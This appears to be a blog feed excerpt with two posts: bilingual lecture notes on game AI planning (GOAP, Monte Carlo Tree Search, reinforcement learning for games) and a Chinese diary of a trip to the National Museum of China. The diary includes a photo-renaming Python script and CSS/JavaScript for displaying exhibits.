    • Priority decides which goal should be selected among all the possible goals

      优先级决定在所有可能的目标中选择哪个目标

    • Each goal can be presented as a Collection of States

      每个目标都可以表示为状态集合

    webp

    Goal Selection

    ​目标选择

    webp

    Action Set

    ​动作集

    An action in GOAP has a precondition, an effect, and a cost

    ​GOAP 中的动作具有前提条件、效果和成本

    • Precondition: in which state the character can do this action

      前提条件:角色在哪种状态下可以执行此动作

    • Effect: how the world state changes after the action is done

      效果:执行动作后,世界状态如何变化

    • Cost: defined by the developer, used as a weight to find the plan with the lowest cost

      成本:由开发人员定义,用作制定成本最低的计划的权重

    webp

    Backward Planning Like a Human

    ​像人类一样进行反向规划

    • When making a plan, start from goal state

      制定计划时,从目标状态开始

    webp

    Goal: cure the poison

    Backward planning: use the antidote ← buy the antidote with money ← visit the store and pay

    Planning

    ​规划

    Step 1

    • Check goals according to priority

      根据优先级检查目标

    • Find the first goal of which precondition is satisfied

      找到第一个满足先决条件的目标

    webp

    Step 2

    • Compare the target state with world state to find unsatisfied goal

      将目标状态与世界状态进行比较,找出未满足的目标

    • Set all unsatisfied states of the goal into a stack

      将目标的所有未满足状态放入堆栈中

    webp

    Step 3

    • Check the top unsatisfied state from the stack

      从堆栈中检查顶部未满足的状态

    • Select an action from action set which could satisfy the chosen state

      从操作集中选择一个可以满足所选状态的操作

    • Pop the state if it is satisfied by the selected action

      如果所选操作满足该状态,则弹出该状态

    webp

    Step 4

    • Push action to plan stack

      将操作推送到计划堆栈

• Check the precondition of the corresponding action

      检查相应操作的前提条件

    • If precondition is not satisfied, push state to stack of unsatisfied states

      如果前提条件不满足,则将状态推送到不满足状态堆栈

    webp
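Steps 2 to 4 above can be condensed into a small regressive loop. The sketch below reuses the hypothetical Action/WorldState types from the earlier snippet; it greedily picks the first action whose effect satisfies the top unsatisfied state, while a production planner would instead search for the cheapest combination (see the graph formulation below).

#include <algorithm>
#include <optional>
#include <stack>
#include <vector>

// Minimal backward-planning sketch; greedy and unoptimized on purpose.
std::optional<std::vector<Action>> PlanBackward(
    const WorldState& current, const WorldState& goal,
    const std::vector<Action>& actions)
{
    std::stack<std::string> unsatisfied;
    for (const auto& s : goal)
        if (!current.count(s)) unsatisfied.push(s);        // Step 2

    std::vector<Action> plan;                               // plan stack
    while (!unsatisfied.empty()) {                          // Step 3
        const std::string state = unsatisfied.top();
        unsatisfied.pop();
        const Action* chosen = nullptr;
        for (const auto& a : actions)
            if (a.effect.count(state)) { chosen = &a; break; }
        if (!chosen) return std::nullopt;                   // nothing satisfies it
        plan.push_back(*chosen);                            // Step 4
        for (const auto& pre : chosen->precondition)
            if (!current.count(pre)) unsatisfied.push(pre); // push its preconditions
    }
    std::reverse(plan.begin(), plan.end());  // collected goal-first, execute in reverse
    return plan;
}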

    Build States-Action-Cost Graph

    ​构建状态-动作-成本图

    Can be turned into a path planning problem

​可以转化为路径规划问题(动态规划)。

    • Node: combination of states

      节点:状态组合

    • Edge: Action

      边:动作

    • Distance: Cost

      距离:成本

    Search direction

    ​搜索方向

    • Start node: states of the goal

      起始节点:目标状态

    • End node: current states

      结束节点:当前状态

    webp

    ​根据目标解毒,从当前状态找到成本最低的路线。

    The Lowest Cost Path

    ​最低成本路径

    Can use A* or other shortest path algorithms

    ​可以使用 A* 或其他最短路径算法

• The heuristic can be represented by the number of unsatisfied states

      启发式算法可以用不满足状态的数量来表示

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

• Compared with HTN, GOAP planning is more dynamic

      与 HTN 相比,GOAP 计划更具动态性

    • Decoupling goals and behaviors

      将目标和行为分离

• HTN can easily suffer from precondition/effect mismatch mistakes, which GOAP avoids

      HTN 很容易犯前提条件 / 效果不匹配的错误

    Cons:

    ​缺点:

• In a single AI system, the runtime planning is slower than BT/FSM/HTN

      在单个 AI 系统中,运行时规划会比 BT/FSM/HTN 慢

• Also needs a well-represented world state and action effects

  还需要良好表示的世界状态和行动效果

Monte Carlo Tree Search

​蒙特卡洛树搜索

    MCTS is another automated planning, and it behaves more diversely

    ​MCTS 是另一种自动化规划,其行为更加多样化

    webp

    ​AlphaGo 就用到了蒙特卡洛树搜索。

    webp

Like playing chess, simulate millions of possible moves in mind and choose the “best” move

    ​就像下棋一样,在脑海中模拟数百万种可能的走法,并选择“最佳”一步

    Monte Carlo Method

    ​蒙特卡洛方法

    • A broad class of computational algorithms that rely on repeated random sampling to obtain numerical results

      一大类依赖重复随机抽样来获得数值结果的计算算法

    webp

    Monte Carlo Tree Search

    webp

    ​对于当前棋局状态,给出可能的合理行为,求 best move。

    States and Actions

    ​状态和动作

    State

    ​状态

    • The state of game

      游戏状态

    • Represented by a node

      用节点表示

    webp

    Action

    ​动作

• One-step operation of the AI

      人工智能的一步操作

    • Represented by an edge

      用边表示

    webp

State Transfer

​状态转移

Transfer the state from A to B by an action

    webp

    State Space

    ​状态空间

A Tree-Structured State Space:

    ​树结构状态空间:

    The set of states that can be reached from the current state after a possible sequence of actions

    ​从当前状态经过一系列可能的操作后可以到达的状态集

    webp

    NOTICE: Rebuild the State Space for Each Move

    ​注意:每次移动都要重建状态空间

    webp

    Simulation: Playing a Game in Mind Quickly

    ​模拟:快速在脑海中玩游戏

    Simulation

    ​模拟

    • Run from the state node according to the Default Policy to produce an outcome

      根据默认策略从状态节点运行以产生结果

    In the case of Go

    ​围棋的情况

    • Apply random moves from the state until the game is over

      从状态中应用随机动作直到游戏结束

    • Return 1 (win) or 0 (loss) depending on the result

      根据结果返回 1(赢)或 0(输)

    Default Policy

    ​默认策略

    • A meaningful but quick rule or neural network to playthe game

      一个有意义但快速的规则或神经网络来玩游戏

    webp

    How to evaluate the states?

    ​如何评估状态?

    Evaluation Factors

    ​评估因素

    • Q: Accumulation of Simulation Results

      Q:模拟结果的累积

    • N: Number of simulations

      N:模拟次数

Simulation results and the number of simulations may come not from direct simulation but from child nodes

    ​模拟结果和模拟次数可能不是直接模拟,而是来自子节点

    webp

    Backpropagate

    ​反向传播

Propagate the influence of the child state back to the parent state

    ​将子状态的影响传播回父状态

• $Q_{FatherNode}=Q_{FatherNode}+Q_{ChildNode}$

• $N_{Node}=N_{Node}+1$

    • Repeat it until reaching the root

      重复此操作直至到达根节点

    webp

Iteration Steps

    ​迭代步骤

    • Selection: select the most urgent “expandable” node

      选择:选择最紧急的“可扩展”节点

• Expansion: expand the tree by selecting an action

      扩展:通过选择操作扩展树

    • Simulation: simulate from the new node and produce an outcome

      模拟:从新节点进行模拟并产生结果

    • Backpropagate: backpropagate the outcome of simulation from the new node

      反向传播:从新节点反向传播模拟结果

    webp

    Search in “Infinite” State Space

    ​在“无限”状态空间中搜索

    Generally impossible to traverse the state space

    ​通常不可能遍历状态空间

    • We prioritize exploring the most promising regions in state space

      我们优先探索状态空间中最有希望的区域

    • Pre-set a computational budget and stop exploring the state space when the budget is reached

      预设计算预算,并在达到预算时停止探索状态空间

    Selection-Expandable Node

    ​选择可扩展节点

    Select the most urgent “expandable” node

    ​选择最紧急的“可扩展”节点

“Expandable” node

    ​“可扩展”节点

    • Nonterminal state and has unvisited children

      非终止状态且有未访问的子节点

    • Example:

      示例:

    webp

    Selection-Exploitation and Exploration

    ​选择-开发和探索

    Exploitation

    ​开发

    • Look in areas which appear to be promising

      寻找看似有希望的领域

    • Select the child which has high Q/N value

      选择具有高 Q/N 值的子项

    webp

    Exploration

    ​探索

    • Look in areas that have not been well sampled yet

      查看尚未充分采样的区域

    • Select the child which has low number of visits

      选择访问次数较少的子项

    webp

    webp

    UCB (Upper Confidence Bounds)

    ​UCB(置信上限)

    How to balance exploration and exploitation?

    ​如何平衡探索和开发?

    • Use UCB (Upper Confidence Bounds) formula

      使用 UCB(置信上限)公式

    • $UCB_j$ :the UCB value of the node $j$

      $UCB_j$:节点 $j$ 的 UCB 值

    • $Q_j$: the total reward of all playouts that passed through node $j$

      $Q_j$:经过节点 $j$ 的所有播放的总奖励

    • $N_j$ : the number of times node $j$ has been visited

      $N_j$:节点 $j$ 被访问的次数

    • $N$ : the number of times the parent node of node $j$ has been visited

      $N$:节点 $j$ 的父节点被访问的次数

• $C$: a constant, adjusted to lower or increase the amount of exploration performed

      $C$:一个常数,调整以降低或增加探索执行量
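The formula itself only appears in the slide image; written out, and consistent with the LCB formula quoted later in this section (with the exploration term added instead of subtracted), the standard UCB1 form is:

$$UCB_{j}=\frac{Q_j}{N_j}+C\cdot\sqrt{\frac{2\ln(N)}{N_j}}$$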

    webp

    Selection

    ​选择

    How to select the most urgent expandable node

    ​如何选择最紧急的可扩展节点

    • Always Search from the root node

      始终从根节点搜索

    • Find the highest UCB value child node (promising child) of current node

      查找当前节点的 UCB 值最高的子节点(有希望的子节点)

    • Set promising child as current node

      将有希望的子节点设置为当前节点

    • Iterate above steps until current node is expandable. Set current node as selected node

      迭代上述步骤,直到当前节点可扩展。将当前节点设置为选定节点

    webp
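A minimal C++ sketch of this selection walk (the Node type and its fields are hypothetical, not engine code): descend from the root by UCB until reaching an expandable node.

#include <cmath>
#include <cstddef>
#include <limits>
#include <vector>

// Hypothetical MCTS node; field names are illustrative.
struct Node {
    double Q = 0.0;               // accumulated simulation reward
    int    N = 0;                 // visit count
    bool   terminal = false;
    std::size_t totalActions = 0; // how many children could exist in total
    Node*  parent = nullptr;
    std::vector<Node*> children;

    // Expandable: nonterminal and still has unvisited (uncreated) children
    bool IsExpandable() const { return !terminal && children.size() < totalActions; }
};

double UCB(const Node& n, double C) {
    if (n.N == 0) return std::numeric_limits<double>::infinity();
    return n.Q / n.N + C * std::sqrt(2.0 * std::log(n.parent->N) / n.N);
}

// Walk down from the root, always following the highest-UCB child,
// and stop at the first expandable node.
Node* Select(Node* root, double C) {
    Node* current = root;
    while (!current->IsExpandable() && !current->children.empty()) {
        Node* best = current->children.front();
        for (Node* child : current->children)
            if (UCB(*child, C) > UCB(*best, C)) best = child;
        current = best;
    }
    return current;
}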

    Expansion

    ​扩展

• One or more new child nodes are added to the selected node, according to the available actions

      根据可用操作,向选定节点添加一个或多个新子节点

    • The value of child node is unknown

      子节点的值未知

    webp

    Simulation and Backpropagation

    ​模拟和反向传播

    webp

    The End Condition

    ​结束条件

    Computational budget

    ​计算预算

    • Memory size (the number of nodes)

      内存大小(节点数)

    • Computation time

      计算时间

    webp

    How to Choose the Best Move?

    ​如何选择最佳移动?

    The “best” child node of current state node

    ​当前状态节点的“最佳”子节点

    • Max child: Select the root child with the highest Q-value

      最大子节点:选择具有最高 Q 值的根子节点

    • Robust child: Select the most visited root child

      稳健子节点:选择访问次数最多的根子节点

• Max-Robust child: Select the root child with both the highest visit count and the highest reward. If none exists, then continue searching until an acceptable visit count is achieved

      最大稳健子节点:选择访问次数和奖励都最高的根子节点。如果不存在,则继续搜索,直到达到可接受的访问次数。

• Secure child: Select the child which maximises a lower confidence bound (LCB)

      安全子节点:选择最大化下置信区间 (LCB) 的子节点

    $$LCB_{j}=\frac{Q_j}{N_j}-C\cdot\sqrt{\frac{2\ln(N)}{N_j}}$$

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

• The MCTS agent behaves diversely

      MCTS 代理行为多样

    • Agent makes the decision totally by itself

      代理完全自行做出决策

    • Can solve the problem of large search space

      可以解决搜索空间大的问题

    Cons:

    ​缺点:

    • The action and state are hard to design for most real-time games

      对于大多数实时游戏来说,动作和状态很难设计

    • It is hard to model for most real-time games

      对于大多数实时游戏来说,很难建模

Machine Learning Basics

    ​机器学习基础

    Machine Learning

    ​机器学习

    Four Types of Machine Learning

    ​机器学习的四种类型

    • Supervised learning

      监督学习

    • Unsupervised learning

      无监督学习

    • Semi-supervised learning

      半监督学习

    • Reinforcement learning

      强化学习

    webp

    ML Types: Supervised Learning

    ​ML 类型:监督学习

    • Learn from labeled data

      训练时提供标记数据

    webp

    ML Types: Unsupervised Learning

    ​ML 类型:无监督学习

    • Learn from unlabeled data

      从未标记的数据中学习

    webp

    ​无监督学习便于处理聚类问题。

    ML Types: Semi-supervised Learning

    ​ML 类型:半监督学习

    • Learn from a lot of unlabeled data and very scarce labeled data

      从大量未标记数据和非常稀少的标记数据中学习

    webp

    ML Types: Reinforcement learning

    ​ML 类型:强化学习

    • Learn from an interaction process with environment

      从与环境的交互过程中学习

    webp

    Reinforcement Learning

    ​强化学习

    Reinforcement learning (RL) is an area of machine learning concerned with how intelligent agents ought to take actions in an environment in order to maximize the notion of cumulative reward.

    强化学习 (RL) 是机器学习的一个领域,它关注智能代理如何在环境中采取行动,以最大化累积奖励的概念。

    • Trial-and-error search

      反复试验

    • The learner must discover which actions yield the most reward by trying them

      学习者必须通过尝试发现哪些行动能产生最大的奖励

    • Delayed reward

      延迟奖励

• Actions may affect the immediate reward, the next situation and all subsequent rewards

      行动可能会影响即时奖励、下一个情况和所有后续奖励

    Markov Decision Process-Basic Elements (1/4)

    ​马尔可夫决策过程-基本概念

    • Agent

      代理

      The learner and decision maker

      学习者和决策者

    • Environment

      环境

      The thing the agent interacts with, comprising everything outside the agent

      代理与之交互的事物,包括代理之外的一切

    webp

    Markov Decision Process-State (2/4)

    ​马尔可夫决策过程 - 状态 (2/4)

    State is the observation of the agent, and the data structure is designed by human

    ​状态是代理的观察,数据结构由人设计

    webp

    Markov Decision Process-Action (3/4)

    ​马尔可夫决策过程-行动 (3/4)

Action is the minimal behavior element of the agent in the game. It is also designed by humans

    ​行动是代理在游戏中可以表现的最小元素,它也是由人类设计的

    webp

    Markov Decision Process-Reward (4/4)

    ​马尔可夫决策过程-奖励 (4/4)

A special signal the agent receives at each time step, passed from the environment to the agent

    ​代理在从环境传递到代理的每个时间步骤中收到的特殊信号

    webp

MDP Mathematical Model

​MDP 数学模型

    • Probability of transition

      转换概率

      The probability of transition from s to s’ after taking action a

      采取行动 a 后从 s 转换到 s’ 的概率

$$p(s'|s, a)=P(S_t=s'|S_{t-1}=s, A_{t-1}=a)$$

    • Policy

      策略

      A mapping from states to probabilities of selecting each possible action

      从状态到选择每个可能行动的概率的映射

$$\pi(a|s)=P(A_t=a|S_t=s)$$

    • Total reward

      总奖励

      The cumulative reward it receives in the long run

      从长远来看,它获得的累积奖励

$$G_t=R_{t+1}+R_{t+2}+R_{t+3}+\cdots+R_T$$

$$G_t=R_{t+1}+\gamma R_{t+2}+\gamma^2R_{t+3}+\cdots$$
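The discounted form can be written compactly (a standard identity, with discount factor $\gamma\in[0,1]$):

$$G_t=\sum_{k=0}^{\infty}\gamma^{k}R_{t+k+1}$$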

    webp

    Policy

    ​策略

    A mapping from states to probabilities of selecting each possible action

    ​从状态到选择每个可能动作的概率的映射

    $$\pi(a|s)=P(A=a|S=s)$$

    webp

    Build Advanced Game AI

    ​构建高级游戏 AI

Why Game AI Needs Machine Learning

    ​为什么游戏 AI 需要机器学习

It is notable that all previous methods actually need human knowledge to design (including the cost in GOAP)

    ​值得注意的是,之前的方法实际上都需要人类知识来设计(包括 GOAP 的成本)

But players always expect AI to be able to both deal with a complicated game world and behave naturally and diversely

    ​但玩家总是希望 AI 能够既能应对复杂的游戏世界,又能表现得自然多样

• Traditional methods work in a limited space

      传统方法空间有限

• Machine learning creates infinite possibilities

      机器学习创造无限可能

    webp

    Machine Learning Framework in Game

    ​游戏中的机器学习框架

The framework of deploying a neural network to act as an agent

    ​部署神经网络扮演代理的框架

    Observation:

    ​观察:

• The game state the AI can observe

      人工智能可以观察到的游戏状态

      • Vector feature

        矢量特征

      • Unit information

        单位信息

      • Environment information

        环境信息

      • Etc.

• Image

      图像

    webp

    DRL Example-Model the Game

    ​DRL 示例-游戏建模

    A DRL design process should contain:

    ​DRL 设计流程应包含:

    • State

      状态

    • Action

      动作

    • Reward

      奖励

    • NN design

      神经网络设计

    • Training Strategy

      训练策略

    webp

    DRL Example-State

    webp

    ​如上图这个游戏,状态 = 小地图 + 游戏统计 + 单位 + 玩家数据

    States (1/2)-Maps

    ​状态-地图

    Heights

    ​高度

    Visibility: fog of war

    ​可见性:战争迷雾

Creep

​菌毯(Creep)

    Entity owners

    ​实体所有者

    Alerts

    ​警报

    Pathable

    ​可行进

    Buildable

    ​可建造

    webp

    States(2/2)-Units Information

    ​状态(2/2)-单位信息

For each unit in a frame

​针对每一帧中的每个单位

    ​Unit type 单位类型

    ​OwnerStatus 所有者状态

    ​Display type 显示类型

    ​Position 位置

    ​Number of workers 工人数量

    ​Cool down 冷却

    ​Attributes 属性

    ​Unit attributes 单位属性

    ​Cargo status 货物状态

    ​Building status 建筑状态

    ​Resource status 资源状态

    ​Order status 订单状态

    ​Buff status 增益状态

    webp

    Actions

    ​动作

    For a unit it should have actions like

    ​对于一个单位来说,它应该有以下动作

    • What

      什么

      • move

        移动

      • attack

        攻击

      • build

        建造

    • Who

    • Where

      哪里

• When to take the next action

      何时进行下一步行动

    webp

    Rewards (1/2)

    ​奖励(1/2)

    Direct reward from game

    ​游戏直接奖励

    • Win: +1

      赢:+1

    • Lose: -1

      输:-1

    Pseudo-reward output along with critic network:

    ​与评论网络一起输出的伪奖励:

• the distance between the agent’s operation and the human data statistic z

  代理操作与人类数据统计量 z 之间的距离

    webp

    Rewards (2/2)

    ​奖励 (2/2)

Reward is much denser in OpenAI Five for Dota 2

​Dota 2 中 OpenAI Five 的奖励更加密集

    Different reward settings could help us to train different styles of agent

    ​不同的奖励设置可以帮助我们训练不同风格的代理

    • Aggressive

      激进

    • Conservative

      保守

    webp

    NN architectures

    webp

    ​OpenAI 提供的玩 Dota2 的神经网络架构。

    DRL example-Multi-Layer Perceptron (MLP)

    ​DRL 示例-多层感知器 (MLP)

    Classical and easy to implement

    ​经典且易于实现

    Flexible definition of the dimensions of inputs and outputs

    ​灵活定义输入和输出的维度

    webp

    Scalar feature example

    ​标量特征示例

    • Race

      种族

    • Owned Resource

      拥有的资源

    • Upgrade

      升级

    • Etc.

    DRL example-Convolutional Neural Network (CNN)

    ​DRL 示例-卷积神经网络(CNN)

    webp

    ​还介绍了 ResNet。

    DRL example-Transformer

    ​DRL 示例-Transformer

    • Introduce attention mechanisms

      引入注意力机制

    • Uncertain length vector

      不确定长度向量

    • Well represent the complex feature like multi agents

      很好地表示像多代理这样的复杂特征

    webp

    DRL example-Long-Short Term Memory (LSTM)

    ​DRL 示例 - 长短期记忆 (LSTM)

Enables the AI to remember or forget earlier data

    ​使 AI 能够记住或忘记早期数据

    webp

    DRL example-NN Architecture Selection

    ​DRL 示例-NN 架构选择

    NN Architecture selection for different type of feature

    ​不同类型特征的 NN 架构选择

    • Fixed length vector feature

      固定长度向量特征

  • Multi-Layer Perceptron

    多层感知器

    • Uncertain length vector feature

      不确定长度向量特征

      • Long-Short Term Memory

        长短期记忆

      • Transformer

    • Image feature

      图像特征

      • ResNet
    • Raycast

    • Mesh

    webp

    Training Strategy-Supervised learning

    ​训练策略-监督学习

AlphaStar is trained via both supervised learning and reinforcement learning. It first learned a policy by supervised learning from human expert data

    ​AlphaStar 通过监督学习和强化学习进行训练。它首先通过监督学习从人类专家数据中学习策略

z is a statistic summary of a strategy sampled from human data (for example, a build order)

    ​z 是从人类数据中采样的策略的统计摘要(例如,构建顺序)

    Minimize the distance (KL divergence) of agent policy and human decision distribution sampled from z

    ​最小化从 z 中采样的代理策略和人类决策分布的距离(KL 散度)

    webp

    Training Strategy-Reinforcement learning

    ​训练策略-强化学习

Second, it used RL techniques to improve the SL policy

    ​其次,采用强化学习技术改进 SL 策略

TD(λ), V-trace and UPGO are specific reinforcement learning methods to improve the actor network and the critic network.

    ​TD(λ)、V-trace、UPGO 是改进参与者网络和评论家网络的具体强化学习方法。

The KL divergence towards the old SL policy is also considered

​还会考虑与旧 SL 策略的 KL 散度

    These tricks improved the policy and made it more human-like

    ​这些技巧改进了策略,使其更像人类

    webp

Train the Agent-Self-Play & Adversarial

​训练 Agent-自博弈与对抗

In AlphaStar, three pools of agents attend training, initialized from the SL policy

    ​在 AlphaStar 中,三个 Agent 池参加从 SL 策略初始化的训练

    • Main agents [MA]

      主要 Agent [MA]

  • Goal: the most robust agent, used as the final output

    目标:最稳健的 Agent,作为最终输出

      • Self-play (35%)

        自我游戏 (35%)

      • Against past LE and ME agents (50%)

        对抗过去的 LE 和 ME Agent (50%)

      • Against past MA agents (15%)

        对抗过去的 MA Agent (15%)

    • League exploiters [LE]

      联盟利用者 [LE]

      • Goal: find weakness of past all agents (MA, LE, ME)

        目标:找到过去所有 Agent (MA、LE、ME) 的弱点

      • Against all past agents (MA, LE, ME)

        对抗所有过去的 Agent (MA、LE、ME)

    • Main exploiters [ME]

      主要利用者 [ME]

      • Goal: find weakness of current MA agent

        目标:找到当前 MA Agent 的弱点

      • Against current MA agent

        对抗当前的 MA Agent

    webp

    RL or SL?——SL analysis

    ​RL 还是 SL?——SL 分析

    Supervised Learning needs high quality data, and sometimes behaves well too

    ​监督学习需要高质量的数据,有时表现也很好

• It behaves like a human

      它表现得像人类

    • But may not outperform human expert data

      但可能不会胜过人类专家数据

    • Human data is unbalanced

      人类数据不平衡

    • Sometimes there is not enough data

      有时数据不足

    webp

    RL or SL?-RL analysis

    ​RL 还是 SL?-RL 分析

    Reinforcement Learning is usually considered as the optimal solution, however

    ​强化学习通常被认为是最佳解决方案,但是

    • Training a RL model is tough

      训练 RL 模型很困难

    • The model is hard to converge

      模型很难收敛

    • The game environment for training is also a huge development project

      训练的游戏环境也是一个巨大的开发项目

    • The data collection process could be slow

      数据收集过程可能很慢

• And the behavior may be unnatural

      行为可能不自然

    webp

    RL or SL?——Dense reward

    ​RL 还是 SL?——密集奖励

    What makes a good problem for RL

    ​什么才是 RL 的好问题

    webp

RL or SL?——Summary

​RL 还是 SL?——总结

Situation for SL(SL 的情况):

• Easy to get data

  轻松获取数据

• Needs to perform like human

  需要像人类一样表现

Situation for RL(RL 的情况):

• Needs to outperform the master level

  需要超越大师水平

• Enough budget

  足够的预算

• Data is unavailable

  数据不可用

• Dense reward

  密集奖励

    Hybrid

    ​混合

    Machine Learning is powerful.

    ​机器学习很强大。

But it also costs a lot. For example, DeepMind spent 250 million dollars to finish AlphaStar, and a replication would need 13 million dollars

​但成本也很高。例如,DeepMind 花费 2.5 亿美元完成 AlphaStar,而复制需要 1300 万美元

We often need to make a tradeoff and place the DNN only at the points that require human-like behavior (a part of the whole combat).

​我们经常需要做出权衡,只在需要类人表现的点上使用 DNN(整个战斗的一部分)。

    webp

    References

    HTN

    GOAP

    MCTS

    Machine Learning

    Machine Learning Game Applications

    ]]>
    @@ -1643,7 +1643,7 @@ /posts/Diary-%E5%8F%88%E4%BA%AC%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - 这是前言

    ​在北方想有点时间就去北京的各大博物馆开开眼界,第一站——中国国家博物馆!刚好 6.16 是个六级考完还不会有啥事的周末,17:00 提前订票,开冲🤩!


    ​Python 给手机拍摄的图片批量重命名:

    import os

    file_path = r"D:\XXX"
    file_name_list = []

for file in os.listdir(file_path):
    file_name = file.split('_')[-1][:4] + '.jpg'
    count = 1
    while file_name in file_name_list:
        file_name = file.split('_')[-1][:4] + '_' + str(count) + '.jpg'
        count += 1
    file_name_list.append(file_name)
    os.rename(os.path.join(file_path, file), os.path.join(file_path, file_name))

    ​为了便于展示国博的各个“宝贝”,设计一个 Exhibit 类:

    .exhibits-container {
    display: flex;
    margin: 10px 0;
    padding: 10px 5px;
    }

    .exhibits-container.common {
    border: 2px solid var(--border);
    transition: border 0.5s ease-in-out;
    }

    .exhibits-container.rare {
    border: 2px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic {
    border: 2px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend {
    border: 2px solid #ff9800;
    background: #ff980020;
    }

    .exhibits-container.rare blockquote{
    border-left: 4px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic blockquote{
    border-left: 4px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend blockquote{
    border-left: 4px solid #ff9800;
    background: #ff980020;
    }

    .reverse {
    flex-direction: row-reverse;
    }

    .exhibits-img-container img {
    max-width: 80%;
    box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);
    margin: 0 auto;
    }

    .exhibits-img-container .hidden {
    display: none;
    }

    .exhibits-container-left {
    max-width: 50%;
    justify-content: center;
    }

    .exhibits-container-right {
    width: 100%;
    margin: 0 5px;
    }

    .exhibits-container-right .title {
    margin: 5px auto;
    font-weight: bold;
    font-size: 18px;
    }

    .exhibits-container-right .desc {
    margin: 0 auto;
    padding: 0 10px;
    }

    .exhibits-container-left,
    .exhibits-container-right {
    display: flex;
    flex-direction: column;
    justify-content: center;
    }

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    .f-button.is-prev {
    transform: translateY(-50%) translateX(-12px) !important;
    }

    .f-button.is-next {
    transform: translateY(-50%) translateX(12px) !important;
    }

    .f-carousel__dots {
    transform: translateY(8px);
    }

    .f-carousel__slide {
    display: flex;
    align-items: center;
    }

    @media screen and (max-width: 660px) {
    .exhibits-container {
    flex-direction: column !important;
    }

    .exhibits-container-left {
    max-width: 100%;
    margin: 0;
    }

    .exhibits-container-right {
    width: auto;
    margin: 10px 5px 5px;
    }

    }
var exhibitsCount = 0;

class Exhibits {
    // ravity: 稀有度('common' / 'rare' / 'epic' / 'legend')
    constructor(ravity, img, title, desc = "", quote = "") {
        this.exhibitsContainer = $('<div>').addClass('exhibits-container').addClass(ravity);
        exhibitsCount += 1;
        if (exhibitsCount % 2 == 0) {
            this.exhibitsContainer.addClass('reverse');
        }
        const exhibitsContainerLeft = $('<div>').addClass('exhibits-container-left');
        const exhibitsImgContainer = $('<div>').addClass('exhibits-img-container');

        if (img.length == 1) {
            exhibitsImgContainer.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('data-original', img[0][0]).attr('alt', img[0][1]));
        }
        else {
            const fCarousel = $('<div>').addClass('f-carousel');
            const fCarouselViewport = $('<div>').addClass('f-carousel__viewport');
            fCarousel.append(fCarouselViewport);
            const fCarouselTrack = $('<div>').addClass('f-carousel__track');
            fCarouselViewport.append(fCarouselTrack);

            for (const item of img) {
                let fCarouselSlide = $('<div>').addClass('f-carousel__slide');
                // 与单图分支保持一致,使用 data-original 交由懒加载处理(原文此处重复设置了 src)
                fCarouselSlide.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('data-original', item[0]).attr('alt', item[1]));
                fCarouselTrack.append(fCarouselSlide);
            }
            exhibitsImgContainer.append(fCarousel);
            new Carousel(fCarousel.get(0), {});
        }

        exhibitsContainerLeft.append(exhibitsImgContainer);
        const exhibitsContainerRight = $('<div>').addClass('exhibits-container-right');
        const titlePara = $('<p>').addClass('title').text(title);

        exhibitsContainerRight.append(titlePara);

        if (desc.length > 0) {
            const descPara = $('<p>').addClass('desc').text(desc);
            exhibitsContainerRight.append(descPara);
        }

        if (quote.length > 0) {
            const quotePara = $('<blockquote>').append($('<p>').text(quote));
            exhibitsContainerRight.append(quotePara);
        }

        this.exhibitsContainer.append(exhibitsContainerLeft).append(exhibitsContainerRight);
    }

    render() {
        $(document.currentScript).before(this.exhibitsContainer);
    }
}

    ​使用方法示例(用到了轮播插件 Carousel | Fancyapps UI - Robust JavaScript UI Component Library,必须提前引入):

<script>
    new Exhibits('common', [
        ['国博/1-远古时期/0904_2.webp', '野兽残骸'],
        ['国博/1-远古时期/0904_3.webp', '野兽残骸'],
        ['国博/1-远古时期/0904_4.webp', '野兽残骸'],
    ], '野兽残骸',
        '​祖先们与野兽相伴。',
    ).render();
</script>

    ​参考《炉石传说》的稀有度,依据“宝贝”的名气及其做工的精湛程度,按主观臆断给这些“宝贝”分为“普通”、“稀有”、“史诗”和“传说”四个等级😍!如有异议,算我没文化。


    ​国博里的“宝贝”太多了,短时间内不能把这些东西都讲清楚。这个系列应该会不断维护并完善其内容。

    这是正文

    我出发了

    05:56 每日任务

    每日任务

    ​夏天到了,醒得越来越早了……

    ​大早上 5 点 40 左右起床下楼,宿管阿姨居然已经提前把宿舍门开了。吃喝拉撒完,考虑到中午在国博进餐不便,去食堂提前把肉夹馍买好了。肉夹馍阿姨跟我说这是见到我的第 4 个学期了,居然才知道我是个研究生😇。

    ​再去实验室门口完成一下每日任务,然后乘公交去保定东站!

    06:48 保定东站

    本学期第二次拜访

    ​之前怕起不来赶不上早发的车,买的 G6716,08:19 保定东 - 08:50 北京西,¥63。事实证明是可以在宿管阿姨开门后,在 7 点以前赶到高铁站的。于是改签 G6720,07:03 保定东 - 07:24 高碑店东 - 07:53 北京西,¥57。这样就可以赶在开门前到国博了,除去退票费还退了 4 块钱😍!

    06:59 逆向高铁

    看来走的跟上次不是一个道

    ​这次上车方向居然跟上次进京方向相反……

    07:17 燕南赵北

    高碑店东

    ​高碑店东站广场上的四个大字。啊,河北!大河之北,燕南赵北。乱世兵家必争之地,盛世一大冤种😭。

    07:42 永定河旁

    老北京园博园

    ​西边进京。永定河旁出现了北京园博园里的各色奇异建筑。

    07:49 北京电塔

    老北京电视塔

    ​这个电视塔长得跟天津的几乎一模一样,但是比天津的矮一些。

    07:50 北京西站

    老北京雾蒙蒙

    ​北京西站上面还有个老北京特色建筑。

    ​恭喜!今天早上有北京特产可爱小雾霾!

    探索国博

    08:27 开始排队

    老北京排长队

    ​下车。乘坐地铁 9 号线北京西站-军事博物馆-地铁 1 号线天安门东,¥4。

    ​9 点开门的国博于 8 点半就已经排起了长队。

    这么多人?
    这就是北京!

    老北京天安门

    ​看到天安门了,来跟之前一直很想去看天安门的爱国凡哥问个好!

    😭凡哥
    给你看天安门
    真快啊

    侧面看国博

    ​排队过程中来一张侧面的国博。

    09:00 成功入场

    国博导航

    ​经过一次近乎机场安检级别的安检,终于进场了!

